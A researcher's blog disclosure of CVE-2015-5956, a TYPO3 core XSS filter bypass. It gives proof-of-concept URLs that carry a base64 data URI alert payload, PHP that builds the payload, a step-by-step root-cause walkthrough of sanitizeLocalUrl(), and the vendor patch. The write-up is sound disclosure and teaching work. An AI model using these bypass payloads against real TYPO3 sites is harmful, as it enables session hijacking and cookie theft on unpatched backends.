CVE-2015-5956: Bypassing the TYPO3 Core XSS Filter

TYPO3 is the most widely used enterprise content management system with more than 500,000 installations. I recently discovered a non-persistent Cross-Site Scripting vulnerability in its core and publicly disclosed the details as CVE-2015-5956.

This blog article should give you some insights into the vulnerability, because it’s not only a simple XSS, but a rather nice XSS filter bypass. But before digging into PHP stuff, I’d like to highlight the really great work by the TYPO3 security team!!11 This was definitely one of the best and most efficient coordinations I have ever done. Special thanks go out to Helmut Hummel, who was always professional and transparent about TYPO3’s work on an update.

Vulnerability Description and PoCs

The TYPO3 version branches 6.x and 4.x (and 7.x in theory) are vulnerable to an authenticated, non-persistent Cross-Site Scripting vulnerability when user-supplied input is processed by the sanitizeLocalUrl() function. While there is already an XSS filter in place, it is possible to bypass it by using a data URI with a base64-encoded payload.

The payload differs slightly between the vulnerable branches: 6.x needs a space in the data URI payload, while 4.x doesn’t. In the following proofs of concept, the JavaScript <script>alert('XSS')</script> is used as a base64-encoded data URI in the “returnUrl” and “redirect_url” parameters, which can be found throughout TYPO3.
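As a rough illustration of how the two payload variants can be put together, here is a minimal sketch. The variable names are made up for this example and are not part of TYPO3; only the space is percent-encoded, so the result matches the form used in the proof-of-concept URLs.

```php
<?php
// The script that should end up running in the victim's browser.
$script  = "<script>alert('XSS')</script>";
$encoded = base64_encode($script);

// 4.x variant: no space after the comma.
$payload4x = 'data:text/html;base64,' . $encoded;

// 6.x variant: a single space after the comma.
$payload6x = 'data:text/html;base64, ' . $encoded;

// Encode only the space as %20 for use in a query string.
$query6x = 'redirect_url=' . str_replace(' ', '%20', $payload6x);

echo $payload4x, PHP_EOL;
echo $query6x, PHP_EOL;
```

The only difference between the two variants is the single space, which becomes important later in the root cause analysis.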

The first proof of concept exploits the vulnerability using the “returnUrl” parameter by forging the back link in the Typo3-backend “Show record history” module:

https://example.com/typo3/show_rechis.php?returnUrl=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

An authenticated victim who has the access rights required for the module, follows the URL, and afterwards clicks on the back link will be exploited (a pretty high amount of social engineering is needed).

With the 6.x Branch Proof-of-Concept the victim does not need to be logged into the backend. The attacker simply sends him/her the following link:

https://example.com/typo3/index.php?redirect_url=data:text/html;base64,%20PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

By clicking on this link, the victim is redirected to the TYPO3 login page.

After entering valid login credentials, the victim gets exploited like in the previous example, because TYPO3 uses the “redirect_url” parameter in the HTTP Location header to forward the user. This considerably reduces the amount of social engineering needed to prepare this attack.

The 7.x branch is basically vulnerable too, but to exploit it the attacker additionally needs to know a secret token (moduleToken) that is included in every request, which makes exploitation infeasible.

https://example.com/typo3/index.php?M=record_history&moduleToken=260ab28ad4973d29e0a77d2f799e79ca3028de28&element=tt_content%3A1&returnUrl=&returnUrl=data:%20text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

The vulnerability can be used to temporarily embed arbitrary script code into the context of the TYPO3 backend interface, which offers a wide range of possible attacks such as stealing cookies or attacking the browser and its components. Since this XSS is not only a simple one, but a rather nice filter bypass, the following root cause analysis will show you how the bypass happens. It is based on the 6.x branch.

Root Cause Analysis

Let’s have a look at the file /typo3/sysext/core/Classes/Utility/GeneralUtility.php which causes all the trouble and go through it step by step to find out how the filter is bypassed:

 
/**
 * Checks if a given string is a valid frame URL to be loaded in the
 * backend.
 *
 * @param string $url potential URL to check
 * @return string either $url if $url is considered to be harmless, or an
 */
static public function sanitizeLocalUrl($url = '') {
    $sanitizedUrl = '';
    $decodedUrl = rawurldecode($url);
    if (!empty($url) && self::removeXSS($decodedUrl) === $decodedUrl) {
        $testAbsoluteUrl = self::resolveBackPath($decodedUrl);
        $testRelativeUrl = self::resolveBackPath(self::dirname(self::getIndpEnv('SCRIPT_NAME')) . '/' . $decodedUrl);
        // Pass if URL is on the current host:
        if (self::isValidUrl($decodedUrl)) {
            if (self::isOnCurrentHost($decodedUrl) && strpos($decodedUrl, self::getIndpEnv('TYPO3_SITE_URL')) === 0) {
                $sanitizedUrl = $url;
            }
        } elseif (self::isAbsPath($decodedUrl) && self::isAllowedAbsPath($decodedUrl)) {
            $sanitizedUrl = $url;
        } elseif (strpos($testAbsoluteUrl, self::getIndpEnv('TYPO3_SITE_PATH')) === 0 && $decodedUrl[0] === '/') {
            $sanitizedUrl = $url;
        } elseif (strpos($testRelativeUrl, self::getIndpEnv('TYPO3_SITE_PATH')) === 0 && $decodedUrl[0] !== '/') {
            $sanitizedUrl = $url;
        }
    }
    if (!empty($url) && empty($sanitizedUrl)) {
        self::sysLog('The URL "' . $url . '" is not considered to be local and was denied.', 'Core', self::SYSLOG_SEVERITY_NOTICE);
    }
    return $sanitizedUrl;
}

Initially, the $url argument of the sanitizeLocalUrl() function contains the XSS payload fed in through one of the vulnerable parameters, e.g.:

data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

This is then passed through a rawurldecode() call, which simply replaces every percent-encoded sequence (% followed by two hex digits) with its literal character. Since there are none, the payload stays the same and is copied to $decodedUrl. The next function, removeXSS(), is a little bit more complex, but in the first step it just includes the third-party class “RemoveXSS” and then calls process() on the payload string:

/**
 * Wrapper for the RemoveXSS function.
 * Removes potential XSS code from an input string.
 *
 * Using an external class by Travis Puderbaugh <kallahar@quickwired.com>
 *
 * @param string $string Input string
 * @return string Input string with potential XSS code removed
 */
static public function removeXSS($string) {
    require_once PATH_typo3 . 'contrib/RemoveXSS/RemoveXSS.php';
    $string = \RemoveXSS::process($string);
    return $string;
}

The class is too complex to describe in detail here, but to summarize how it works: it basically breaks up potential Cross-Site Scripting payloads by inserting an “<x>” into them. So if you feed it a typical alert payload like

 "><script>alert('XSS')</script>

It would output something like:

 "><sc<x>ript>alert('XSS')</script>

Even an encoded version of the same payload would still be recognized and modified by the filter.

Back in the sanitizeLocalUrl() function, the first if-check only continues if $url is not empty and its decoded version is identical (same value and same type) to the result of the removeXSS() call:

if (!empty($url) && self::removeXSS($decodedUrl) === $decodedUrl)

This means that if the payload is modified by the removeXSS() function in any way, the if-check evaluates to false and the subsequent commands are not executed. The sanitizeLocalUrl() then returns an empty string, which was set right at the beginning and wasn’t modified up to the end. This however results in the payload being removed from the request. Bad boy.

If you pass the payload through the removeXSS() function:

data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

It simply outputs the same string, because neither a typical XSS string was found nor any encoded strings are present, which means the if-statement evaluates to true. First filter bypassed successfully 🙂 !
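To make the “filter output must equal the input” guard more tangible, here is a minimal sketch. Note that standInFilter() is a hypothetical stand-in that only breaks up the word “script”; it is not the RemoveXSS class, and passesFilterGuard() is a made-up name that mirrors just the first if-check of sanitizeLocalUrl().

```php
<?php
/**
 * Hypothetical stand-in for a keyword-based filter. This is NOT RemoveXSS;
 * it only inserts "<x>" into the word "script" (case-insensitive).
 */
function standInFilter(string $input): string
{
    return str_ireplace('script', 'sc<x>ript', $input);
}

/**
 * Mirrors the first guard of sanitizeLocalUrl(): the URL is only processed
 * further if the filter leaves the decoded value completely untouched.
 */
function passesFilterGuard(string $url): bool
{
    $decodedUrl = rawurldecode($url);
    return !empty($url) && standInFilter($decodedUrl) === $decodedUrl;
}

// A classic payload is modified by the filter, so the guard rejects it.
var_dump(passesFilterGuard("\"><script>alert('XSS')</script>"));

// The base64 data URI contains nothing the filter recognizes, so it passes.
var_dump(passesFilterGuard('data:text/html;base64,%20PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='));
```

The weakness of this kind of guard is that it can only reject what the filter knows how to spot; a base64-encoded body is opaque to a keyword-based filter.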

Up next is a series of URL validation checks:

$testAbsoluteUrl = self::resolveBackPath($decodedUrl);

The resolveBackPath() function resolves “../” segments in a path. It first checks whether the string contains a double dot at all:

/**
 * Resolves "../" sections in the input path string.
 * For example "fileadmin/directory/../other_directory/" will be resolved to "fileadmin/other_directory/"
 *
 * @param string $pathStr File path in which "/../" is resolved
 * @return string
 */
static public function resolveBackPath($pathStr) {
    if (strpos($pathStr, '..') === FALSE) {
        return $pathStr;
    }
    $parts = explode('/', $pathStr);
    $output = array();
    $c = 0;
    foreach ($parts as $part) {
        if ($part === '..') {
            if ($c) {
                array_pop($output);
                --$c;
            } else {
                $output[] = $part;
            }
        } else {
            ++$c;
            $output[] = $part;
        } 
    }
    return implode('/', $output);
}

But since the payload does not contain the string “..”, the first if-check in the resolveBackPath() function already evaluates to true, so the input is returned unmodified.
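To see both code paths in action, the following sketch transcribes the resolveBackPath() listing above into a standalone function. The name resolveBackPathSketch() is made up so that it can run outside of TYPO3.

```php
<?php
// Standalone transcription of the resolveBackPath() listing for experiments.
function resolveBackPathSketch(string $pathStr): string
{
    if (strpos($pathStr, '..') === false) {
        return $pathStr; // no ".." anywhere: early return, input untouched
    }
    $output = [];
    $c = 0;
    foreach (explode('/', $pathStr) as $part) {
        if ($part === '..') {
            if ($c) {
                array_pop($output); // step back one directory
                --$c;
            } else {
                $output[] = $part;  // nothing left to pop, keep the ".."
            }
        } else {
            ++$c;
            $output[] = $part;
        }
    }
    return implode('/', $output);
}

$payload = 'data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=';

// The example from the docblock is resolved as documented.
echo resolveBackPathSketch('fileadmin/directory/../other_directory/'), PHP_EOL;

// The payload takes the early return and comes back unchanged.
var_dump(resolveBackPathSketch($payload) === $payload);
```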

The subsequent check for the relative URL is a bit more complex again. It basically gets the executing “SCRIPT_NAME” (in this example: /typo3/index.php), and passes it to the dirname() function, which returns the directory part of the path, without the trailing / – so in this case “/typo3”. Finally a slash followed by the payload is added.

$testRelativeUrl = self::resolveBackPath(self::dirname(self::getIndpEnv('SCRIPT_NAME')) . '/' . $decodedUrl);

Therefore a string like the following is constructed:

/typo3/data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

It is passed through the resolveBackPath() function again, and also returns the same value, because the double-dot string is not found.
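The construction of $testRelativeUrl can be reproduced roughly like this. The sketch assumes that PHP’s built-in dirname() behaves like TYPO3’s own dirname() helper for this input, and it uses the SCRIPT_NAME value from the example above.

```php
<?php
$payload    = 'data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=';
$scriptName = '/typo3/index.php'; // example SCRIPT_NAME used in this article

// Directory of the executing script, a slash, then the untouched payload.
$testRelativeUrl = dirname($scriptName) . '/' . $payload;

echo $testRelativeUrl, PHP_EOL;
```

Because the resulting string still contains no “..”, a subsequent resolveBackPath() call has nothing to resolve.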

The next if-conditions are the final thing that needs to be bypassed. The first one, the isValidUrl() function call, is the most important because it is the reason why a space is needed in the payload:

if (self::isValidUrl($decodedUrl)) {
    if (self::isOnCurrentHost($decodedUrl) && strpos($decodedUrl, self::getIndpEnv('TYPO3_SITE_URL')) === 0) {
        $sanitizedUrl = $url;
    }

Quite a couple of checks are performed here. The first if-check inside isValidUrl() is skipped, because $parsedUrl is not null and the scheme is also resolved (it’s actually just “data”). The next if-check tests whether the string starts with the scheme followed by “://”, i.e. “data://”. Since the payload does not start with “data://”, the condition evaluates to true and str_replace() rewrites $url to “data://text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=”. The following buildUrl() call constructs a scheme-valid string from the parsed parts, and it also resolves the payload to “data://text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=”.

/**
 * Checks if a given string is a Uniform Resource Locator (URL).
 *
 * On seriously malformed URLs, parse_url may return FALSE and emit an
 * E_WARNING.
 *
 * filter_var() requires a scheme to be present.
 *
 * http://www.faqs.org/rfcs/rfc2396.html
 * Scheme names consist of a sequence of characters beginning with a
 * lower case letter and followed by any combination of lower case letters,
 * digits, plus ("+"), period ("."), or hyphen ("-").  For resiliency,
 * programs interpreting URI should treat upper case letters as equivalent to
 * lower case in scheme names (e.g., allow "HTTP" as well as "http").
 * scheme = alpha *( alpha | digit | "+" | "-" | "." )
 *
 * Convert the domain part to punicode if it does not look like a regular
 * domain name. Only the domain part because RFC3986 specifies the the rest of
 * the url may not contain special characters:
 * http://tools.ietf.org/html/rfc3986#appendix-A
 *
 * @param string $url The URL to be validated
 * @return boolean Whether the given URL is valid
 */
static public function isValidUrl($url) {
    $parsedUrl = parse_url($url);
    if (!$parsedUrl || !isset($parsedUrl['scheme'])) {
        return FALSE;
    }
    // HttpUtility::buildUrl() will always build urls with ://
    // our original $url might only contain : (e.g. mail:)
    // so we convert that to the double-slashed version to ensure
    // our check against the $recomposedUrl is proper
    if (!self::isFirstPartOfStr($url, $parsedUrl['scheme'] . '://')) {
        $url = str_replace($parsedUrl['scheme'] . ':', $parsedUrl['scheme'] . '://', $url);
    }
    $recomposedUrl = HttpUtility::buildUrl($parsedUrl);
    if ($recomposedUrl !== $url) {
        // The parse_url() had to modify characters, so the URL is invalid
        return FALSE;
    }
    if (isset($parsedUrl['host']) && !preg_match('/^[a-z0-9.\-]*$/i', $parsedUrl['host'])) {
        $parsedUrl['host'] = self::idnaEncode($parsedUrl['host']);
    }
    return filter_var(HttpUtility::buildUrl($parsedUrl), FILTER_VALIDATE_URL) !== FALSE;
}
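The first steps of isValidUrl() can be retraced with plain PHP. This is only a sketch: the recomposition line is a simplified stand-in for HttpUtility::buildUrl(), which is assumed here to join scheme and path with “://” when no other URL parts are present.

```php
<?php
$url    = 'data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=';
$parsed = parse_url($url);

// Normalize "data:" to "data://" in the same way isValidUrl() does.
$prefix = $parsed['scheme'] . '://';
if (strpos($url, $prefix) !== 0) {
    $url = str_replace($parsed['scheme'] . ':', $prefix, $url);
}

// Simplified stand-in for HttpUtility::buildUrl(): for this input only the
// scheme and the path exist, so there is nothing else to reassemble.
$recomposedUrl = $parsed['scheme'] . '://' . ($parsed['path'] ?? '');

var_dump($parsed);                 // scheme and path only
var_dump($recomposedUrl === $url); // the "was anything modified?" comparison
```

For a data URI, parse_url() reports a scheme and a path but no host, which is why the later host check does not come into play.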

The next if-check simply checks whether the previous instructions have modified the original payload (data: text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=).

if ($recomposedUrl !== $url) {
    // The parse_url() had to modify characters, so the URL is invalid
    return FALSE;
}

Since both strings are still the same, the function goes on and checks whether the host part of the string is valid. But there is no host at all, so the isset() in the if-check already returns false. Because PHP uses short-circuit evaluation, the second operand of the && is not evaluated when the first one is already false.

if (isset($parsedUrl['host']) && !preg_match('/^[a-z0-9.\-]*$/i', $parsedUrl['host'])) {
      $parsedUrl['host'] = self::idnaEncode($parsedUrl['host']);
}

The last part is the return instruction, which is quite important because it deals with the needed space!

return filter_var(HttpUtility::buildUrl($parsedUrl), FILTER_VALIDATE_URL) !== FALSE;

To understand what is actually happening here, you must keep in mind that “FILTER_VALIDATE_URL” is one of the official PHP filters. Quoted from their page:

Validates value as URL (according to » http://www.faqs.org/rfcs/rfc2396), optionally with required components. Beware a valid URL may not specify the HTTP protocol http:// so further validation may be required to determine the URL uses an expected protocol, e.g. ssh:// or mailto:. Note that the function will only find ASCII URLs to be valid; internationalized domain names (containing non-ASCII characters) will fail.

So RFC 2396 describes what a URL should look like and includes a part about whitespace, quoted from the RFC:

The space character is excluded because significant spaces may disappear and insignificant spaces may be introduced when URI are transcribed or typeset or subjected to the treatment of word-processing programs. Whitespace is also used to delimit URI in many contexts.

All in all, whitespace is bad, but most browsers accept it anyway. Let’s see what happens when you supply two payloads to the filter_var() function that differ only by a single space:

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

returns the URL string, which means it conforms to RFC 2396.

data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

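returns “false”, because there’s a whitespace in the payload. And that’s exactly what is needed to bypass the filter: isValidUrl() returns false, so the first if-branch with its isOnCurrentHost() check is skipped and the elseif checks get a chance to run.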
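The effect of the space can be checked directly with filter_var(). The sketch below feeds it the recomposed “data://” form of both payloads, on the assumption that this is what buildUrl() hands over in isValidUrl(); the variable names are made up.

```php
<?php
$base64 = 'PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=';

// Recomposed forms of the two payloads, differing only by one space.
$withoutSpace = 'data://text/html;base64,' . $base64;
$withSpace    = 'data://text/html;base64, ' . $base64;

// Same expression as the return statement of isValidUrl().
$validWithoutSpace = filter_var($withoutSpace, FILTER_VALIDATE_URL) !== false;
$validWithSpace    = filter_var($withSpace, FILTER_VALIDATE_URL) !== false;

var_dump($validWithoutSpace);
var_dump($validWithSpace);
```

Somewhat counterintuitively, it is the variant that fails validation that gets through, because only a failed isValidUrl() lets the later elseif branches run.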

Back at the second if check in the sanitizeLocalUrl() function:

elseif (self::isAbsPath($decodedUrl) && self::isAllowedAbsPath($decodedUrl)) {
    $sanitizedUrl = $url;

It checks via the isAbsPath() function whether the payload is an absolute path. This also returns false, because the payload neither starts with a slash nor looks like a Windows drive path:

/**
 * Checks if the $path is absolute or relative (detecting either '/' or 'x:/' as first part of string) and returns TRUE if so.
 *
 * @param string $path File path to evaluate
 * @return boolean
 */
static public function isAbsPath($path) {
    return $path[0] === '/' || TYPO3_OS === 'WIN' && (strpos($path, ':/') === 1 || strpos($path, ':\\') === 1);
}

The third if checks whether the $testAbsoluteUrl string starts with TYPO3_SITE_PATH. As a reminder, $testAbsoluteUrl is the actual payload:

data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

elseif (strpos($testAbsoluteUrl, self::getIndpEnv('TYPO3_SITE_PATH')) === 0 && $decodedUrl[0] === '/') {
    $sanitizedUrl = $url;

The TYPO3_SITE_PATH string always resolves to the directory of the frontend website. So in this example it’s just “/”.

TYPO3_SITE_PATH =       [path_dir] of the TYPO3 website frontend

This makes the first strpos() comparison evaluate to false, because the first “/” in the payload is not at position 0. Due to short-circuit evaluation, the second check isn’t performed anymore.

The last if-check performs the same operation as the previous one, but on the $testRelativeUrl string, which is

/typo3/data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=

The first strpos condition evaluates to true, because the first character of the $testRelativeUrl string is the TYPO3_SITE_PATH (“/”). The second condition, which checks whether the first char of the ORIGINAL payload is not a slash also evaluates to true.

elseif (strpos($testRelativeUrl, self::getIndpEnv('TYPO3_SITE_PATH')) === 0 && $decodedUrl[0] !== '/') {
    $sanitizedUrl = $url;
}

Pwned. This means that the last if-check assigns the input payload to $sanitizedUrl, which is in the end returned and echoed back to the backend.
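The outcome of the last two branches can be replayed with the example values from this walkthrough. This is a sketch with made-up variable names; the site path “/” and the “/typo3/” prefix are the values assumed in the article’s example setup.

```php
<?php
$payload         = 'data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=';
$sitePath        = '/';                   // TYPO3_SITE_PATH in this example
$testAbsoluteUrl = $payload;              // unchanged by resolveBackPath()
$testRelativeUrl = '/typo3/' . $payload;  // script directory + "/" + payload

// Third branch: the first "/" of the payload is not at offset 0.
$firstSlash  = strpos($testAbsoluteUrl, $sitePath);
$thirdBranch = $firstSlash === 0 && $payload[0] === '/';

// Fourth branch: the prefixed string starts with "/" and the payload does not.
$fourthBranch = strpos($testRelativeUrl, $sitePath) === 0 && $payload[0] !== '/';

var_dump($firstSlash);
var_dump($thirdBranch);
var_dump($fourthBranch);
```

The fourth branch only ever looks at the prefix that TYPO3 itself prepended, so any string that does not start with a slash satisfies it.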

How did Typo3 fix the bug?

Typo3 changed the following file with their patch: /typo3/sysext/core/Classes/Utility/GeneralUtility.php

Let’s have a quick look at the patch that TYPO3 published to fix the issue. It is just a small one; two lines have been changed:

Another parse_url() call was added to split the payload (URL) into its different parts.
The last elseif-check was modified to additionally require that the URL has no scheme (e.g. http, https or data), so only scheme-less relative URLs can pass it.

/**
 * Checks if a given string is a valid frame URL to be loaded in the
 * backend.
 *
 * @param string $url potential URL to check
 * @return string either $url if $url is considered to be harmless, or an
 */
static public function sanitizeLocalUrl($url = '') {
    $sanitizedUrl = '';
    $decodedUrl = rawurldecode($url);
    if (!empty($url) && self::removeXSS($decodedUrl) === $decodedUrl) {
        $parsedUrl = parse_url($decodedUrl);
        $testAbsoluteUrl = self::resolveBackPath($decodedUrl);
        $testRelativeUrl = self::resolveBackPath(self::dirname(self::getIndpEnv('SCRIPT_NAME')) . '/' . $decodedUrl);
        // Pass if URL is on the current host:
        if (self::isValidUrl($decodedUrl)) {
            if (self::isOnCurrentHost($decodedUrl) && strpos($decodedUrl, self::getIndpEnv('TYPO3_SITE_URL')) === 0) {
                $sanitizedUrl = $url;
            }
        } elseif (self::isAbsPath($decodedUrl) && self::isAllowedAbsPath($decodedUrl)) {
            $sanitizedUrl = $url;
        } elseif (strpos($testAbsoluteUrl, self::getIndpEnv('TYPO3_SITE_PATH')) === 0 && $decodedUrl[0] === '/') {
            $sanitizedUrl = $url;
        } elseif (empty($parsedUrl['scheme']) && strpos($testRelativeUrl, self::getIndpEnv('TYPO3_SITE_PATH')) === 0 && $decodedUrl[0] !== '/') {
            $sanitizedUrl = $url;
        }
    }
    if (!empty($url) && empty($sanitizedUrl)) {
        self::sysLog('The URL "' . $url . '" is not considered to be local and was denied.', 'Core', self::SYSLOG_SEVERITY_NOTICE);
    }
    return $sanitizedUrl;
}
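To see the effect of the added scheme check in isolation, here is a minimal sketch of the patched last branch. The function name and its default parameter values are made up for illustration; it expects a non-empty, already decoded URL, as the surrounding !empty($url) guard ensures in the real code.

```php
<?php
/**
 * Sketch of the patched last elseif-branch only. $scriptDir and $sitePath
 * default to the example values used in this article.
 */
function passesPatchedLastBranch(
    string $decodedUrl,
    string $scriptDir = '/typo3',
    string $sitePath = '/'
): bool {
    $parsedUrl       = parse_url($decodedUrl);
    $testRelativeUrl = $scriptDir . '/' . $decodedUrl;

    return empty($parsedUrl['scheme'])
        && strpos($testRelativeUrl, $sitePath) === 0
        && $decodedUrl[0] !== '/';
}

// The data URI has the scheme "data", so it is rejected now.
var_dump(passesPatchedLastBranch('data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='));

// A plain relative backend URL has no scheme and still passes.
var_dump(passesPatchedLastBranch('show_rechis.php?element=pages'));
```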

Good work. Mission accomplished.